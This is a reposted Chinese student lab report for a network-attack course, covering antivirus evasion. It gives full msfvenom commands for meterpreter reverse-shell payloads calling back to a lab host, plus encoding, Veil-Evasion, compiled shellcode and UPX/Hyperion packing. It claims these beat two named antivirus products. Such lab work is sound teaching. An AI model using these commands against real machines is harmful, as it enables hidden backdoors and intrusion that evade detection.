2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践
2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践
1 免杀原理与实验内容
1.1 免杀原理
一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
- 哪里有后门呢?
- 编译器留后门
- 操作系统留后门
- 最常见的当然还是应用程序中留后门
- 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。
1.2 实验内容
任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程。
任务二:通过组合应用各种技术实现恶意代码免杀。
任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本。
2 基础问题回答
(1)杀软是如何检测出恶意代码的?
基于特征码的检测:如果一个可执行文件(或其他运行的库、脚本等)包含一段特征码就是一段或多段数据则被认为是恶意代码。
基于行为的恶意软件检测:指通用的、多特征的、非精确的扫描,如果一个可执行文件存在非授权的操作,那么就把它认定为恶意的。
(2)免杀是做什么?
- 免杀就是让安插的后门不被AV软件发现。
(3)免杀的基本方法有哪些?
- 通过改变特征码:
- 对于EXE文件进行加壳处理(压缩壳、加密壳)。
- 对于shellcode,用基于payload重新编译生成可执行文件或用encode进行编码。
- 对于源代码,用其他语言进行重写再编译(veil-evasion)。
- 通过改变行为:
- 通讯方式
- 尽量使用反弹式连接
- 使用隧道技术
- 加密通讯数据
- 操作模式
- 基于内存操作
- 减少对系统的修改
- 加入混淆作用的正常功能代码
- 通讯方式
3 实验步骤
3.1 使用msf编码器,msfvenom生成如jar之类的文件
- 实验二中使用msf生成了后门程序,使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。 用VirusTotal扫描后结果如下图。
结果显示告诉我们后门程序如果不加处理,绝大多数杀软很快就可以识别出来。
输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.26.133 LPORT=5209 -f exe > test.exe
对后门程序进行10次编码尝试降低检出率。再次使用VirusTotal扫描,结果如下,没有任何变化。
- 输入
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.26.133 lport=5209 x> test2.jar
生成jar文件进行测试。 - 输入
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.26.133 lport=5209 x> test3.php
生成PHP文件进行测试。 - 输入
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.26.133 LPORT=5209 -f raw > shell.jsp
生成jsp文件并伪装名字成shell,进行测试。
3.2 veil-evasion
安装步骤参考安装免杀工具Veil-Evasion然而我没有在自己的虚拟机中安装成功,崩了虚拟机之后拷了其他同学的。
输入
veil
进入veil的界面,再输入use evasion
进入Evil-Evasion。
- 输入
use c/meterpreter/rev_tcp.py
进入配置界面。 - 输入
set LHOST 192.168.26.133
设置反弹连接。 - 输入
set LPORT 5209
设置端口号。 - 输入
generate
生成文件。 - 输入
09_c_txt
playload的名字。
3.2 使用shellcode编程
- 输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.26.133 LPORT=5209 -f c
生成一段c语言格式的shellcode数组。 - 将生成的shellcode写成函数并进行调用。
- 输入
sudo apt-get install mingw-w64
下载编译软件,输入i686-w64-mingw32-g++ 09scode.c -o 09scode.exe
。 - 检测结果如下。
3.3 加壳
- 压缩壳:输入
upx 09scode.exe -o 09scode.upxed.exe
尝试对上面的shellcode加壳,并进行检测,结果如下。
- 加密壳:将生成upx文件拷贝到/usr/share/windows-binaries/hyperion/目录中并进入,输入
wine hyperion.exe -v 09scode.upxed.exe shell09.exe
进行加壳,检测结果如下。
3.4 通过组合应用各种技术实现恶意代码免杀
- 采用C语言调用bloxor编码的shellcode方式免杀成功并可以回连
- 被控主机:win10
- 扫描软件:360安全卫士11.5
- 输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=192.168.26.133 LPORT=5209 -f c
生成shellcode。 - 在win10中查杀结果如下。
3.5 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
- 先用msfvenom生成shellcode,再使用压缩壳和加密壳进行加壳。
- 实验环境:win7虚拟机,腾讯电脑管家13.0.版本。
- 结果如下。
4. 离实战还缺些什么技术或步骤?
- 对免杀的知识了解还不够多,只是能够利用软件生成简单的恶意代码并对其进行加壳;伪装手法还是很低级,没有办法真正的攻入一台电脑并不被其发现。
5. 实践总结与体会
实验中还是很容易出现虚拟机崩盘的情况的,也被杀毒软件搞到有点难受,但是情况总比办法多。通过这次实验让我更加的体会到虽然安装了杀毒软件,但其也不万能的。
转载于:https://www.cnblogs.com/tutu233/p/10633315.html
2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践相关推荐
- 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
20145307陈俊达<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的 ...
- 20145317 《网络对抗技术》免杀原理与实践
20145317 <网络对抗技术>免杀原理与实践 免杀技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码: 使用encode等进行编码,进行异或.+1.-1等类似操作改变特征 ...
- 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...
- 20145308 《网络对抗》 MAL_免杀原理及实践 学习总结
20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
- 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
<网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...
- 2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践 免杀的概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-Ant ...
- 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...
最新文章
- java线程钥匙_Java多线程并发编程/锁的理解
- linux3.0 nand分区,OK6410(256MRAM2Gnandflash) Linux3.0.1内核移植
- python抢红包脚本实例-这个Python脚本牛逼了,秒抢红包,再不怕错过一个亿了!...
- python入门-直方图
- [计组]寄存器和存储器的区别
- java agent 监控tomcat_promethues监控tomcat
- python爬取网站数据步骤_python怎么爬取数据
- oracle 数据库字段html显示正常text显示不全,layui表格字段表格显示不全(自适应)...
- 如何理解 Spring AOP 以及使用 AspectJ?
- 如何检查数字是否为2的幂
- [BUG]Ubuntu server 16.04安装,无网卡驱动解决
- Yedda Twitter C# Library
- 天堂2服务端服务器名字修改,如何制作L2J天堂2单机版源码服务端教程.doc
- word文档怎么删除论文末尾尾注的横线
- mybatis插入大于号小于号到oracle
- 2021年中国PLG模式的SaaS公司新增的有哪些代表?
- 【C语言】C语言之数字金字塔全家桶
- C#基础面试题(附答案)
- 最常见的解决方法:error:C2059 语法错误:“using namespace”
- 云计算和云服务器分别表示什么?
热门文章
- java cookie 取不到_java中Servlet Cookie取不到值原因解决办法
- 你觉得python很难嘛?那只是你没有理解而已
- 重磅更新!YoloV4最新论文!解读yolov4框架
- 资源| 深度学习公众号推荐(值得关注的公众号)
- 《Python编程从入门到实践》记录之Python函数传递任意数量的实参
- 数学建模之图论——图与网络模型(二)(最小生成树问题、最大流问题)
- 复述-软考高级-网规-数据灾备
- 浙江高级会计师评审计算机要求,浙江2020年高级会计师评审申报论文要求
- Win10下启动telnet客户端
- FileZilla 服务器端win server2008以上的配置